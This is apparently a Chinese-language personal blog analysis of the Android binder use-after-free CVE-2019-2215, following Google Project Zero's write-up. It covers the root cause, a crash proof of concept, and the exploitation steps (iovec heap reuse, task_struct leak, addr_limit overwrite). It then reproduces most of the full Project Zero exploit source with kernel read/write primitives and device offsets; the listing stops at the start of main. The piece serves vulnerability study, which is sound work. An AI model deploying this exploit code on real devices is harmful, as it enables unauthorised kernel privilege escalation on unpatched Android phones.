最近有了点时间,好好看了下CVE-2019-2215的漏洞利用细节,这里记录下来,一方面留着以后再看方便,一方面把自己的理解写出来也是学习的一种方式。

这里问我写的内容可以看成是对Google Project Zero的文章的翻译加上一些个人想法,不过还是推荐看看原文,链接在这里, 因为看的其他的多多少少都有点模糊的地方,没有P0的文章说的详细,这也是我想自己写一个分析的原因。

1. Root Cause

通过阅读对应的issue page和 根据对应的内核Patch(需要注意commit里的内容不太准确), 造成CVE-2019-2215的根本原因在于binder driver内部在收到BINDER_THREAD_EXIT的ioctl后,负责释放对应binder_thread的函数在free binder_thread前没有检查当前binder_thread 是否在epoll中存在引用,从而导致在epoll中存在引用的binder_thread在被释放后依然在epoll中存在一个悬挂指针。当后面epoll因为一些原因尝试删除该已经被释放的binder_thread内部指向的一个waitqueue时出现未定义行为,如Crash(当被free的binder_thread所在的内存已经被分配给其他对象复写破坏时)

利用下面的poc可以在开了KASAN的对应kernel上触发crash

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
#include <fcntl.h>
#include <sys/epoll.h>
#include <sys/ioctl.h>
#include <unistd.h>

#define BINDER_THREAD_EXIT 0x40046208ul

int main()
{
        int fd, epfd;
        struct epoll_event event = { .events = EPOLLIN };

        fd = open("/dev/binder0", O_RDONLY);
        epfd = epoll_create(1000);
        epoll_ctl(epfd, EPOLL_CTL_ADD, fd, &event);
        ioctl(fd, BINDER_THREAD_EXIT, NULL);
}

整个触发时间过程如下图:

binder poll crash

可以看到首先通过ioctl 释放binder_thread, 然后程序退出,触发epoll的waitqueue删除操作,从而触发crash。在没打补丁且开了KASAN的对应虚拟机上尝试,可以得到如下的call stack。

kasan

从这里就能看到Crash是在remove_wait_queue里面被触发,因为 ep_remove_wait_queue调用了remove_wait_queue, 而remove_wait_queue里面调用了spin_lock_irqsave

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
static void ep_remove_wait_queue(struct eppoll_entry *pwq)
{
        wait_queue_head_t *whead;

        rcu_read_lock();
        /*
        * If it is cleared by POLLFREE, it should be rcu-safe.
        * If we read NULL we need a barrier paired with
        * smp_store_release() in ep_poll_callback(), otherwise
        * we rely on whead->lock.
        */
        whead = smp_load_acquire(&pwq->whead);
        if (whead)
                remove_wait_queue(whead, &pwq->wait);
        rcu_read_unlock();
}

void remove_wait_queue(struct wait_queue_head *wq_head, struct wait_queue_entry *wq_entry)
{
        unsigned long flags;

        spin_lock_irqsave(&wq_head->lock, flags);
        __remove_wait_queue(wq_head, wq_entry);
        spin_unlock_irqrestore(&wq_head->lock, flags);
}
EXPORT_SYMBOL(remove_wait_queue);

log with printk

通过分析crash时的log(这里我自己加了printk在binder_thread和ep_remove_wait_queue里面),可以看到Crash时候的binder_thread object的地址是0xffff888046070008,同时在Crash之前的最后一个被释放的eppoll_entry的地址是0xffff88803ab6e6a8。 为了验证binder_thread object对应的fd被加到epoll中后两者的对应关系,我们使用kgdb调试一下kernel,这里具体怎么编译调试的kernel不具体展开,直接看调试打印的变量信息。

kgdb info

可以看到上面crash log里面eppoll_entry.whead刚好就是binder_thread.wait,所以现在可以确定这里ep_remove_wait_queuewhead变量,即remove_wait_queue的参数wq_head就是已经是被释放的binder_thread里的wait,所以当引用wait->lock时指向了一段已经被free的内存,从而在spin_lock_irqsave尝试去写wait->lock时触发KASAN报错。

如果深入检查spin_lock_irqsave,会发现最终调用了_raw_spin_lock_irqsave,其反汇编代码如下,可以看到其中做KASAN检查的地方。这里具体不再展开。

raw spin lock irqsave

需要注意的是,如果lock本身不是0,那么在这里就会hang住,下面的__remove_wait_queue就无法执行,所以后面在做利用的时候需要做到能保持binder_thread.wait.lock的值为0.

2. Exploit

前面在Root Cause里面已经分析过,之所以被KASAN检测到是因为binder_thread 已经被释放,所以wait指向的内存已经被打上KASAN的标记,但是如果KASAN没有开启,epoll的remove流程会继续走下去,最终走到__list_del。当然,P0的文章里也有提到,如果CONFIG_DEBUG_LIST开启的话,会走不同的代码块,并且有很多check,所以不会有exploit的机会存在,这里只讨论没有开启该flag的情况。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
static inline void
__remove_wait_queue(struct wait_queue_head *wq_head, struct wait_queue_entry *wq_entry)
{
        list_del(&wq_entry->entry);
}


#ifndef CONFIG_DEBUG_LIST
...
static inline void list_del(struct list_head *entry)
{
        __list_del(entry->prev, entry->next);
        entry->next = LIST_POISON1;
        entry->prev = LIST_POISON2;
}

static inline void __list_del(struct list_head * prev, struct list_head * next)
{
        next->prev = prev;
        WRITE_ONCE(prev->next, next);
}

这里最开始的old就是eppoll_entry.wait,根据代码的解释,即为binder_thread.wait指向的链表上的一个item

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
/* Wait structure used by the poll hooks */
struct eppoll_entry {
        /* List header used to link this structure to the "struct epitem" */
        struct list_head llink;

        /* The "base" pointer is set to the container "struct epitem" */
        struct epitem *base;

        /*
        * Wait queue item that will be linked to the target file wait
        * queue head.
        */
        wait_queue_t wait;

        /* The wait queue head that linked the "wait" wait queue item */
        wait_queue_head_t *whead;
};

所以当最终走到__list_del时,里面的unlink操作next->prev=prev通过构造一个虚假的binder_thread 对象在已经被free的binder_thread对应的地址处,就可以完成泄漏内存信息和关键数据修改。

2.1 Preparing

要做kernel里的堆布局,那就必须要对想要覆盖的结构体有足够的了解。这里先看一下binder_thread的代码。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
/**
 * struct binder_thread - binder thread bookkeeping
 * @proc:                 binder process for this thread
 *                        (invariant after initialization)
 * @rb_node:              element for proc->threads rbtree
 *                        (protected by @proc->inner_lock)
 * @waiting_thread_node:  element for @proc->waiting_threads list
 *                        (protected by @proc->inner_lock)
 * @pid:                  PID for this thread
 *                        (invariant after initialization)
 * @looper:               bitmap of looping state
 *                        (only accessed by this thread)
 * @looper_needs_return:  looping thread needs to exit driver
 *                        (no lock needed)
 * @transaction_stack:    stack of in-progress transactions for this thread
 *                        (protected by @proc->inner_lock)
 * @todo:                 list of work to do for this thread
 *                        (protected by @proc->inner_lock)
 * @process_todo:         whether work in @todo should be processed
 *                        (protected by @proc->inner_lock)
 * @return_error:         transaction errors reported by this thread
 *                        (only accessed by this thread)
 * @reply_error:          transaction errors reported by target thread
 *                        (protected by @proc->inner_lock)
 * @wait:                 wait queue for thread work
 * @stats:                per-thread statistics
 *                        (atomics, no lock needed)
 * @tmp_ref:              temporary reference to indicate thread is in use
 *                        (atomic since @proc->inner_lock cannot
 *                        always be acquired)
 * @is_dead:              thread is dead and awaiting free
 *                        when outstanding transactions are cleaned up
 *                        (protected by @proc->inner_lock)
 * @task:                 struct task_struct for this thread
 *
 * Bookkeeping structure for binder threads.
 */
struct binder_thread {
        struct binder_proc *proc;
        struct rb_node rb_node;
        struct list_head waiting_thread_node;
        int pid;
        int looper;              /* only modified by this thread */
        bool looper_need_return; /* can be written by other thread */
        struct binder_transaction *transaction_stack;
        struct list_head todo;
        bool process_todo;
        struct binder_error return_error;
        struct binder_error reply_error;
        wait_queue_head_t wait;
        struct binder_stats stats;
        atomic_t tmp_ref;
        bool is_dead;
        struct task_struct *task;
};

这里我们需要注意的是整个binder_thread的size以及waittask的偏移。因为最终我们的目的是构造一个和binder_thread类似size的内核变量去复用同一块内存,然后利用删除链表时对wait的操作去获取task的值,然后再次利用unlink去改写addr_limit。通过调试,我们可以得到binder_thread的size为0x198, wait的offset为0xA0, task的offset为0x190.

binder thread size

2.2 Kernel Object Choosing

为了能够成功复写被Free的binder_thread所在的内存区域,我们需要构造一个大小类似的内核结构或者对象,这里选用的是struct iovec.

1
2
3
4
5
6
// sizeof(iovec) = 0x10
struct iovec
{
        void __user *iov_base;
        __kernel_size_t iov_len;
};

通过使用writevreadv,可以用来向指定stream写入存储在不连续内存块(由iovsec[]定义)中的数据,或者从指定stream读出数据写入一些不连续的内存块中。其中iov_base指定每个内存块的地址,iov_len描述每个内存块的size。

使用iovec的其好处在于iov_baseiov_len都是可控的,只要绕过传入内核时对iov_base做的是否在userspace的校验,往后的任意修改都不会有iov_base必须是指向userspace address的校验。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
struct task_struct {
#ifdef CONFIG_THREAD_INFO_IN_TASK
        /*
        * For reasons of header soup (see current_thread_info()), this
        * must be the first element of task_struct.
        */
        struct thread_info      thread_info;
        #endif
        /* -1 unrunnable, 0 runnable, >0 stopped: */
        volatile long           state;
        ...
};

struct thread_info {
        unsigned long   flags;          /* low level flags */
        mm_segment_t    addr_limit;     /* address limit */
        #ifdef CONFIG_ARM64_SW_TTBR0_PAN
        u64             ttbr0;          /* saved TTBR0_EL1 */
        #endif
        int             preempt_count;  /* 0 => preemptable, <0 => bug */
        ...
};

这里addr_limit的offset是和机器architecture相关的,上面提供的是针对arm64的对应结构的截图,可以看到task_struct的第一个field为thread_info,addr_limit是在thread_info0x8偏移处,所以我们在拿到task_struct的地址后,0x8 offset处即为addr_limit

2.3 Leaking Task_Structure

现在和目标结构题相关的信息,需要注意去bypass的点,以及具体利用unlink的点我们已经大概清楚:

  • binder_thread 的size为0x198
    • wait 的offset为0xa0
      • wait.lock的值必须为0,否则执行流无法走到unlink处
    • task 的offset为 0x190
      • 这里我们要leak前次binder_thread的task数据,所以我们在overlap的时候不能覆盖到0x190之后的内容。
  • arm64下addr_limit位于task_struct 的0x8处
  • iovec的size为0x10
    • iovec.base 必须是指向用户地址,否则不能通过传入kernel时的校验

所以为了能有较大几率在内核复用被释放的binder_thread使用的内存,我们需要 准备一个大小类似的iovec array,再加上我们不能覆盖想要leak的前一个binder_thread.task的内容,所以我们需要准备0x190 / 0x10 = 0x19 个iovec,即iovec[25],而且为了能利用wait去实现unlink,所以iovec[0xa0 / 0x10]处要准备上符合要求且精心构造的数据。这里借用P0博客里的图片展示内存对应关系:

leak task_struct

在确定大概的对应的关系后,我们还需要让相关内存块的内容满足如下要求:

  • wait.lock 需要为0x0
  • iovec.base 必须指向用户空间地址
  • wait.task_list.nextwait.task_list.prev在unlink后都会指向wait.task_list.next

为了实现这个要求,P0在原文中使用了如下的数据来填充关键内存块:

heap layout for leaking task

相关代码如下:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
#define BINDER_THREAD_EXIT 0x40046208ul
// NOTE: we don't cover the task_struct* here; we want to leave it uninitialized
#define BINDER_THREAD_SZ 0x190
#define IOVEC_ARRAY_SZ (BINDER_THREAD_SZ / 16) //25
#define WAITQUEUE_OFFSET 0xA0
#define IOVEC_INDX_FOR_WQ (WAITQUEUE_OFFSET / 16) //10

// Alloc a userspace memory which will satisfy wait.lock == 0
// and iovec.base point to userspace
dummy_page_4g_aligned = mmap((void*)0x100000000UL, 0x2000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);

// Forming iovec[25]
struct iovec iovec_array[IOVEC_ARRAY_SZ];
memset(iovec_array, 0, sizeof(iovec_array));

iovec_array[IOVEC_INDX_FOR_WQ].iov_base = dummy_page_4g_aligned; /* spinlock in the low address half must be zero */
iovec_array[IOVEC_INDX_FOR_WQ].iov_len = 0x1000; /* wq->task_list->next */
iovec_array[IOVEC_INDX_FOR_WQ + 1].iov_base = (void *)0xDEADBEEF; /* wq->task_list->prev */
iovec_array[IOVEC_INDX_FOR_WQ + 1].iov_len = 0x1000;

int b;

int pipefd[2];
if (pipe(pipefd)) err(1, "pipe");
if (fcntl(pipefd[0], F_SETPIPE_SZ, 0x1000) != 0x1000) err(1, "pipe size");
static char page_buffer[0x1000];

iovec[0]iovec[9]里的内容都是0x0,对于iovec.baseiovec.len都为0x0的元素,在写入和读出时将直接跳过。 对于iovec[10](对应于wait.lockwait.task_list.next)和iovec[11](对应于wait.task_list.prev),则填入我们精心构造的数据: 为了满足wait.lock(32bit)为0x0iovec.base指向用户空间,我们需要申请一个低32bit全为0的用户空间内存块,P0原文里申请的是0x100000000UL,刚好满足上述两个要求。

前面已经分析过,在触发unlink时,binder_thread.wait是head,对应于eppoll_entry.whead,而要删除的元素对应于eppoll_entry.wait,而要删除的元素是当前list里面唯一的元素,所以删除后留下的只有eppoll_entry.whead本身,此时head的next和prev都指向其自己。这里直接引用P0的解释图:

before list del after list del

unlink前,

1
2
3
4
5
eppoll_entry.whead->next = 0x1000;
eppoll_entry.whaed->prev = 0xDEADBEEF;

eppoll_entry.wait->next = eppoll_entry.whead;
eppoll_entry.wait->prev = eppoll_entry.wheah;

unlink时,根据list_del的代码:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
static inline void list_del(struct list_head *entry)
{
        __list_del(entry->prev, entry->next);
        entry->next = LIST_POISON1;
        entry->prev = LIST_POISON2;
}

// Here prev, next all point whead.
static inline void __list_del(struct list_head * prev, struct list_head * next)
{
        next->prev = prev;
        WRITE_ONCE(prev->next, next);
}

则unlink完成后,内存布局如下:

leaking task after unlink

这里需要注意的是,在开始触发unlink前,会先在父进程用writev阻塞管道(前面已经把pipe的buffer设置为0x1000)

1
2
ioctl(binder_fd, BINDER_THREAD_EXIT, NULL);
b = writev(pipefd[1], iovec_array, IOVEC_ARRAY_SZ);
  • 在unlink前,父进程writeviovec[10]指向的dummy_page_4g_aligned内存块的0x1000内存读出写入pipe,而后阻塞。
  • 而后子进程触发unlink,改写iovec[11].iov_base为指向&iovec[10].iov_len的指针,接着使用readv读出已经被writev写入pipe的dummy_page_4g_aligned内容
  • 此时writev读取iovec[11].iov_base的内容(此时已被改写为指向binder_thread.wait.task_list的指针),父进程再次调用readv,成功读出被释放从binder_thread.wait.task_list开始的0x1000字节内容到buffer
  • 此时buffer + 0xE8即为task指针值。从而成功拿到当前进程的task_struct结构体地址(wait偏移为0xa0, task偏移为0x190wait.task_listwait + 0x8处,所以distance为0x190-0xa0-0x8 = 0xe8)
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
struct list_head {
        struct list_head *next, *prev;
};

struct wait_queue_head {
        spinlock_t              lock; // 8 Bytes
        struct list_head        head;
};
typedef struct wait_queue_head wait_queue_head_t;

// spinlock_t finally will be below in arm64 8Bytes
typedef struct {
#ifdef __AARCH64EB__
        u16 next;
        u16 owner;
#else
        u16 owner;
        u16 next;
#endif
} __aligned(4) arch_spinlock_t;

wait.head offset


unlink关键利用代码如下:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
pid_t fork_ret = fork();
if (fork_ret == -1) err(1, "fork");
if (fork_ret == 0){
/* Child process */
prctl(PR_SET_PDEATHSIG, SIGKILL);
sleep(2);
printf("CHILD: Doing EPOLL_CTL_DEL.\n");
epoll_ctl(epfd, EPOLL_CTL_DEL, binder_fd, &event);
printf("CHILD: Finished EPOLL_CTL_DEL.\n");
// first page: dummy data
if (read(pipefd[0], page_buffer, sizeof(page_buffer)) != sizeof(page_buffer)) err(1, "read full pipe");
close(pipefd[1]);
printf("CHILD: Finished write to FIFO.\n");

exit(0);
}
//printf("PARENT: Calling READV\n");
ioctl(binder_fd, BINDER_THREAD_EXIT, NULL);
b = writev(pipefd[1], iovec_array, IOVEC_ARRAY_SZ);
printf("writev() returns 0x%x\n", (unsigned int)b);
// second page: leaked data
if (read(pipefd[0], page_buffer, sizeof(page_buffer)) != sizeof(page_buffer)) err(1, "read full pipe");

2.4 Overwrite addr_limit

前面已经拿到了进程的task_struct,下面将会重复类用与上面相似的iovec[25]布局去尝试改写addr_limit。 与leaking task_struct相比,不同之处在于本次不再用writev,而使用recvmsg去接收iovsec[25],阻塞等待,直到write写入数据篡改addr_limit:

利用socket,同样可以如读写iovec数组:

1
2
3
4
struct msghdr msg = {
.msg_iov = iovec_array,
.msg_iovlen = IOVEC_ARRAY_SZ
};

这里只需准备好msghdr结构体,而后利用recvmsg等待数据写入iovec[25]即可。

1
int recvmsg_result = recvmsg(socks[0], &msg, MSG_WAITALL);

再看本次unlink前使用的内存布局:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
struct iovec iovec_array[IOVEC_ARRAY_SZ];
memset(iovec_array, 0, sizeof(iovec_array));

// Unlink Layout
iovec_array[IOVEC_INDX_FOR_WQ].iov_base = dummy_page_4g_aligned; /* spinlock in the low address half must be zero */
iovec_array[IOVEC_INDX_FOR_WQ].iov_len = 1; /* wq->task_list->next */
iovec_array[IOVEC_INDX_FOR_WQ + 1].iov_base = (void *)0xDEADBEEF; /* wq->task_list->prev */
iovec_array[IOVEC_INDX_FOR_WQ + 1].iov_len = 0x8 + 2 * 0x10; /* iov_len of previous, then this element and next element */
iovec_array[IOVEC_INDX_FOR_WQ + 2].iov_base = (void *)0xBEEFDEAD;
iovec_array[IOVEC_INDX_FOR_WQ + 2].iov_len = 8; /* should be correct from the start, kernel will sum up lengths when importing */

secondary iovec layout

本次布局和前次略有不同:

  • iovec[10].iov_len = 1,这里在后面会在创建socket后首先写入1 Byte到dummy_page_4g_aligned指向的内存,令write下次写入时将从iovsec[11].iov_base指向的内存块开始写入数据。
1
2
3
int socks[2];
if (socketpair(AF_UNIX, SOCK_STREAM, 0, socks)) err(1, "socketpair");
if (write(socks[1], "X", 1) != 1) err(1, "write socket dummy byte");

接下来触发unlink漏洞:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
pid_t fork_ret = fork();
if (fork_ret == -1) err(1, "fork");
if (fork_ret == 0){
        /* Child process */
        prctl(PR_SET_PDEATHSIG, SIGKILL);
        sleep(2);
        printf("CHILD: Doing EPOLL_CTL_DEL.\n");
        epoll_ctl(epfd, EPOLL_CTL_DEL, binder_fd, &event);
        printf("CHILD: Finished EPOLL_CTL_DEL.\n");
        // write second_chunk
        if (write(socks[1], second_write_chunk, sizeof(second_write_chunk)) != sizeof(second_write_chunk))
                err(1, "write second chunk to socket");
        exit(0);
}
ioctl(binder_fd, BINDER_THREAD_EXIT, NULL);
struct msghdr msg = {
.msg_iov = iovec_array,
.msg_iovlen = IOVEC_ARRAY_SZ
};
int recvmsg_result = recvmsg(socks[0], &msg, MSG_WAITALL);

overwrite addr_limit

这里借用P0 blog里的图。左边是unlink后的内存布局。 首先依然是利用unlink去改写iovec[10].iov_leniovec[11].iov_base,使其指向iovec[10].iov_len。 而后就是本次攻击的重点,右边部分,该布局是

1
2
if (write(socks[1], second_write_chunk, sizeof(second_write_chunk)) != sizeof(second_write_chunk))
        err(1, "write second chunk to socket");

写入second_write_chunk后的效果。

1
2
3
4
5
6
7
8
unsigned long second_write_chunk[] = {
        1, /* iov_len */ (already used) */
        0xdeadbeef, /* iov_base (already used) */
        0x8 + 2 * 0x10, /* iov_len (already used) */
        current_ptr + 0x8, /* next iov_base (addr_limit) */
        8, /* next iov_len (sizeof(addr_limit)) */
        0xfffffffffffffffe /* value to write - new addr_limit */
};

首先,此时write会从iovec[11].iov_base指向的内存开始写入数据,并且写入数据的size为0x28 Bytes。而此时iovec[11].iov_base指向iovec[10].iov_len所在内存,即偏移为binder_thread + 0xa8处。从而将从0xa8偏移处,依次写入second_write_chunk中的数据。

1
2
3
4
5
iovec[10].iov_len = 1;
iovec[11].iov_base = 0xdeadbeef;
iovec[11].iov_len = 0x28;
iovec[12].iov_base = current_ptr + 0x8;
iovec[12].iov_len = 0x8;

以上刚好是0x28 Bytes的数据,而current_ptr正是我们已经通过第一次leak tast_struct 得到的地址,所以此时的iovec[12].iov_base就指向了addr_limit所在的内存。同时iovec[11].iob_base指向的内存(从iovec[10].iov_len开始的0x28 Bytes)已经写完。所以此时write会将接下来的数据写入iovec[12].iov_base指向的内存(也即存储addr_limit的内存),即

1
2
// current_ptr + 0x8 points to task_stuct.thread_info.addr_limit
*(current_ptr + 0x8) = 0xfffffffffffffffe;

到这里,就成功篡改了addr_limit的限制,后面即可读写kernel任意内存。

2.5 Full Poc

这里把 P0提供的完整poc贴在这里,方便查阅。

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
/*
 * POC to gain arbitrary kernel R/W access using CVE-2019-2215
 * https://bugs.chromium.org/p/project-zero/issues/detail?id=1942
 *
 * Jann Horn & Maddie Stone of Google Project Zero
 *
 * 3 October 2019
*/

#define _GNU_SOURCE
#include <stdbool.h>
#include <sys/mman.h>
#include <sys/wait.h>
#include <ctype.h>
#include <sys/uio.h>
#include <err.h>
#include <sched.h>
#include <fcntl.h>
#include <sys/epoll.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <linux/sched.h>
#include <string.h>
#include <sys/prctl.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <errno.h>

#define BINDER_THREAD_EXIT 0x40046208ul
// NOTE: we don't cover the task_struct* here; we want to leave it uninitialized
#define BINDER_THREAD_SZ 0x190
#define IOVEC_ARRAY_SZ (BINDER_THREAD_SZ / 16) //25
#define WAITQUEUE_OFFSET 0xA0
#define IOVEC_INDX_FOR_WQ (WAITQUEUE_OFFSET / 16) //10

void hexdump_memory(unsigned char *buf, size_t byte_count) {
  unsigned long byte_offset_start = 0;
  if (byte_count % 16)
    errx(1, "hexdump_memory called with non-full line");
  for (unsigned long byte_offset = byte_offset_start; byte_offset < byte_offset_start + byte_count;
          byte_offset += 16) {
    char line[1000];
    char *linep = line;
    linep += sprintf(linep, "%08lx  ", byte_offset);
    for (int i=0; i<16; i++) {
      linep += sprintf(linep, "%02hhx ", (unsigned char)buf[byte_offset + i]);
    }
    linep += sprintf(linep, " |");
    for (int i=0; i<16; i++) {
      char c = buf[byte_offset + i];
      if (isalnum(c) || ispunct(c) || c == ' ') {
        *(linep++) = c;
      } else {
        *(linep++) = '.';
      }
    }
    linep += sprintf(linep, "|");
    puts(line);
  }
}

int epfd;

void *dummy_page_4g_aligned;
unsigned long current_ptr;
int binder_fd;

void leak_task_struct(void)
{
  struct epoll_event event = { .events = EPOLLIN };
  if (epoll_ctl(epfd, EPOLL_CTL_ADD, binder_fd, &event)) err(1, "epoll_add");

  struct iovec iovec_array[IOVEC_ARRAY_SZ];
  memset(iovec_array, 0, sizeof(iovec_array));

  iovec_array[IOVEC_INDX_FOR_WQ].iov_base = dummy_page_4g_aligned; /* spinlock in the low address half must be zero */
  iovec_array[IOVEC_INDX_FOR_WQ].iov_len = 0x1000; /* wq->task_list->next */
  iovec_array[IOVEC_INDX_FOR_WQ + 1].iov_base = (void *)0xDEADBEEF; /* wq->task_list->prev */
  iovec_array[IOVEC_INDX_FOR_WQ + 1].iov_len = 0x1000;

  int b;

  int pipefd[2];
  if (pipe(pipefd)) err(1, "pipe");
  if (fcntl(pipefd[0], F_SETPIPE_SZ, 0x1000) != 0x1000) err(1, "pipe size");
  static char page_buffer[0x1000];
  //if (write(pipefd[1], page_buffer, sizeof(page_buffer)) != sizeof(page_buffer)) err(1, "fill pipe");

  pid_t fork_ret = fork();
  if (fork_ret == -1) err(1, "fork");
  if (fork_ret == 0){
    /* Child process */
    prctl(PR_SET_PDEATHSIG, SIGKILL);
    sleep(2);
    printf("CHILD: Doing EPOLL_CTL_DEL.\n");
    epoll_ctl(epfd, EPOLL_CTL_DEL, binder_fd, &event);
    printf("CHILD: Finished EPOLL_CTL_DEL.\n");
    // first page: dummy data
    if (read(pipefd[0], page_buffer, sizeof(page_buffer)) != sizeof(page_buffer)) err(1, "read full pipe");
    close(pipefd[1]);
    printf("CHILD: Finished write to FIFO.\n");

    exit(0);
  }
  //printf("PARENT: Calling READV\n");
  ioctl(binder_fd, BINDER_THREAD_EXIT, NULL);
  b = writev(pipefd[1], iovec_array, IOVEC_ARRAY_SZ);
  printf("writev() returns 0x%x\n", (unsigned int)b);
  // second page: leaked data
  if (read(pipefd[0], page_buffer, sizeof(page_buffer)) != sizeof(page_buffer)) err(1, "read full pipe");
  //hexdump_memory((unsigned char *)page_buffer, sizeof(page_buffer));

  printf("PARENT: Finished calling READV\n");
  int status;
  if (wait(&status) != fork_ret) err(1, "wait");

  current_ptr = *(unsigned long *)(page_buffer + 0xe8);
  printf("current_ptr == 0x%lx\n", current_ptr);
}

void clobber_addr_limit(void)
{
  struct epoll_event event = { .events = EPOLLIN };
  if (epoll_ctl(epfd, EPOLL_CTL_ADD, binder_fd, &event)) err(1, "epoll_add");

  struct iovec iovec_array[IOVEC_ARRAY_SZ];
  memset(iovec_array, 0, sizeof(iovec_array));

  unsigned long second_write_chunk[] = {
    1, /* iov_len */
    0xdeadbeef, /* iov_base (already used) */
    0x8 + 2 * 0x10, /* iov_len (already used) */
    current_ptr + 0x8, /* next iov_base (addr_limit) */
    8, /* next iov_len (sizeof(addr_limit)) */
    0xfffffffffffffffe /* value to write */
  };

  iovec_array[IOVEC_INDX_FOR_WQ].iov_base = dummy_page_4g_aligned; /* spinlock in the low address half must be zero */
  iovec_array[IOVEC_INDX_FOR_WQ].iov_len = 1; /* wq->task_list->next */
  iovec_array[IOVEC_INDX_FOR_WQ + 1].iov_base = (void *)0xDEADBEEF; /* wq->task_list->prev */
  iovec_array[IOVEC_INDX_FOR_WQ + 1].iov_len = 0x8 + 2 * 0x10; /* iov_len of previous, then this element and next element */
  iovec_array[IOVEC_INDX_FOR_WQ + 2].iov_base = (void *)0xBEEFDEAD;
  iovec_array[IOVEC_INDX_FOR_WQ + 2].iov_len = 8; /* should be correct from the start, kernel will sum up lengths when importing */

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_STREAM, 0, socks)) err(1, "socketpair");
  if (write(socks[1], "X", 1) != 1) err(1, "write socket dummy byte");

  pid_t fork_ret = fork();
  if (fork_ret == -1) err(1, "fork");
  if (fork_ret == 0){
    /* Child process */
    prctl(PR_SET_PDEATHSIG, SIGKILL);
    sleep(2);
    printf("CHILD: Doing EPOLL_CTL_DEL.\n");
    epoll_ctl(epfd, EPOLL_CTL_DEL, binder_fd, &event);
    printf("CHILD: Finished EPOLL_CTL_DEL.\n");
    if (write(socks[1], second_write_chunk, sizeof(second_write_chunk)) != sizeof(second_write_chunk))
      err(1, "write second chunk to socket");
    exit(0);
  }
  ioctl(binder_fd, BINDER_THREAD_EXIT, NULL);
  struct msghdr msg = {
    .msg_iov = iovec_array,
    .msg_iovlen = IOVEC_ARRAY_SZ
  };
  int recvmsg_result = recvmsg(socks[0], &msg, MSG_WAITALL);
  printf("recvmsg() returns %d, expected %lu\n", recvmsg_result,
      (unsigned long)(iovec_array[IOVEC_INDX_FOR_WQ].iov_len +
      iovec_array[IOVEC_INDX_FOR_WQ + 1].iov_len +
      iovec_array[IOVEC_INDX_FOR_WQ + 2].iov_len));
}

int kernel_rw_pipe[2];
void kernel_write(unsigned long kaddr, void *buf, unsigned long len) {
  errno = 0;
  if (len > 0x1000) errx(1, "kernel writes over PAGE_SIZE are messy, tried 0x%lx", len);
  if (write(kernel_rw_pipe[1], buf, len) != len) err(1, "kernel_write failed to load userspace buffer");
  if (read(kernel_rw_pipe[0], (void*)kaddr, len) != len) err(1, "kernel_write failed to overwrite kernel memory");
}
void kernel_read(unsigned long kaddr, void *buf, unsigned long len) {
  errno = 0;
  if (len > 0x1000) errx(1, "kernel writes over PAGE_SIZE are messy, tried 0x%lx", len);
  if (write(kernel_rw_pipe[1], (void*)kaddr, len) != len) err(1, "kernel_read failed to read kernel memory");
  if (read(kernel_rw_pipe[0], buf, len) != len) err(1, "kernel_read failed to write out to userspace");
}
unsigned long kernel_read_ulong(unsigned long kaddr) {
  unsigned long data;
  kernel_read(kaddr, &data, sizeof(data));
  return data;
}
void kernel_write_ulong(unsigned long kaddr, unsigned long data) {
  kernel_write(kaddr, &data, sizeof(data));
}
void kernel_write_uint(unsigned long kaddr, unsigned int data) {
  kernel_write(kaddr, &data, sizeof(data));
}

// Linux localhost 4.4.177-g83bee1dc48e8 #1 SMP PREEMPT Mon Jul 22 20:12:03 UTC 2019 aarch64
// data from `pahole` on my own build with the same .config
#define OFFSET__task_struct__mm 0x520
#define OFFSET__task_struct__cred 0x790
#define OFFSET__mm_struct__user_ns 0x300
#define OFFSET__uts_namespace__name__version 0xc7
// SYMBOL_* are relative to _head; data from /proc/kallsyms on userdebug
#define SYMBOL__init_user_ns 0x202f2c8
#define SYMBOL__init_task 0x20257d0
#define SYMBOL__init_uts_ns 0x20255c0

int main(void) {
  printf("Starting POC\n");
  //pin_to(0);

